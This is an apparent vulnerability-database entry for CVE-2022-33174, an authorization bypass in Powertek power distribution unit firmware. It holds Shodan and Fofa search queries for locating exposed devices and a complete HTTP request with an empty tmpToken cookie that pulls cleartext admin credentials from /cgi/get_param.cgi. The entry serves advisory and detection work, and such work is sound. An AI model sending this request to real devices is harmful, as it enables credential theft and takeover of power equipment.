🔙 목록으로 돌아가기

CVE-2022-33174: Powertek Firmware <3.30.30 - Authorization Bypass

TitlePowertek Firmware <3.30.30 - Authorization Bypass
Authorpikpikcu
SeverityHigh
ImpactAn attacker can bypass authentication and gain unauthorized access to the Powertek Firmware, potentially leading to further compromise of the system.
RemediationUpgrade the Powertek Firmware to version 3.30.30 or higher to mitigate the vulnerability.
CVSS Score7.5
EPSS Score0.81715
CVE IDCVE-2022-33174
CWE IDCWE-863
Shodan Queryhttp.html:"Powertek"http.html:"powertek"
Fofa Querybody="powertek"
Tags cve2022 cve powertek auth-bypass powertekpdus vuln

🔍 Vulnerability Description

Powertek firmware (multiple brands) before 3.30.30 running Power Distribution Units are vulnerable to authorization bypass in the web interface. To exploit the vulnerability, an attacker must send an HTTP packet to the data retrieval interface (/cgi/get_param.cgi) with the tmpToken cookie set to an empty string followed by a semicolon. This bypasses an active session authorization check. This can be then used to fetch the values of protected sys.passwd and sys.su.name fields that contain the username and password in cleartext.

🌐 HTTP Request

GET /cgi/get_param.cgi?xml&sys.passwd&sys.su.name HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Safari/605.1.15
Connection: close
Cookie: tmpToken=;
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-33174.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-33174.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A